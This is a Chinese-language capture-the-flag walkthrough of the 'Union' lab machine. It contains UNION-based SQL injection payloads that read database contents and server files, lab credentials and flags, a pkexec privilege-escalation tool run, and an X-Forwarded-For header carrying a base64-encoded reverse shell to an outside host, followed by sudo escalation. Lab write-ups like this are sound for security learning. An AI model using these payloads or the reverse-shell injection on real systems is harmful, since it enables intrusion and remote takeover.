[Meachines] [Medium] Union UHC+SQLI文件读取+TRP00F+命令注入+sudo权限提升

Information Gathering

IP Address Opening Ports
10.10.11.128 TCP:80

$ ip='10.10.11.128'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI

player=' union select 9;--±

player=' union select group_concat(schema_name) from information_schema.schemata;--±

player=' union select group_concat(table_name) from information_schema.columns where table_schema='november';--±

player=' union select group_concat(one) from november.flag;--±

UHC{F1rst_5tep_2_Qualify}

http://10.10.11.128/challenge.php

player=' union select group_concat(player) from november.players;--±

ippsec,celesian,big0us,luska,tinyboy
player=' union select load_file('/etc/passwd');--±

player=' union select load_file('/var/www/html/index.php');--±

player=' union select load_file('/var/www/html/config.php');--±

username:uhc

password:uhc-11qual-global-pw

User.txt

1618310a48daa65a153e7ca160f99720

TRP00F

https://github.com/MartinxMax/trp00f

$ python3 trp00f.py --lhost 10.10.16.33 --lport 10000 --rhost 10.10.16.33 --rport 10032 --http 9999

! Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

Privilege Escalation:Command Injection && sudo

复制代码
$ curl -X GET "http://10.10.11.128/firewall.php" \
-H "Host: 10.10.11.128" \
-H "Cache-Control: max-age=0" \
-H "Upgrade-Insecure-Requests: 1" \
-H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36" \
-H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" \
-H "Referer: http://10.10.11.128/challenge.php" \
-H "Accept-Encoding: gzip, deflate" \
-H "Accept-Language: en-US,en;q=0.9" \
-H "Cookie: PHPSESSID=34m0q9j1uck8sv7cbstv0vpu6p" \
-H "Connection: close" \
-H "X-Forwarded-For: 1.1.1.1;echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMzLzQ0MyAwPiYx|base64 -d |bash;"

$ sudo su

Root.txt

c6c82ef44b36fad95d3711546e31d86a

相关推荐
数字孪生家族1 小时前
安全、高效、低碳:视频孪生推动智慧电力数字化转型的技术实践
安全·智慧电力数字·数字孪生电力实践案例
联众合科技1 小时前
AF 防火墙与传统防火墙核心差异及新型威胁防御实测
网络·安全
羽翼安全1 小时前
严防屏幕泄密:企业防拍摄系统的技术原理与落地实践
网络·安全·电脑
yagami_gagami2 小时前
第四届黄河流域公安院校电子物证个人赛服务器取证
linux·服务器·网络·mysql·安全·docker·llama
小挪号底迪滴2 小时前
Docker 多阶段构建实战:让 Python 镜像更小、更快、更安全
python·安全·docker
夜雨风云3 小时前
系统或软件的安全(Security)
安全·security·软件设计·软件架构设计·服务质量模型
大模型搬砖师3 小时前
在Kubernetes上部署企业AI网关:一份云原生参考
网络·人工智能·安全
Hello.Reader4 小时前
CloakBrowser 深度解析从 Playwright 包装层到源码级指纹 Chromium,讲透架构、Humanize、GeoIP、供应链安全与生产实战
安全·架构
德迅云安全杨德俊4 小时前
云原生容器安全新标杆
安全·云原生
虹科网络安全10 小时前
解读CRA横向标准EN 40000系列:从法规文本到工程落地 | CRA合规之路(七)
网络·安全·web安全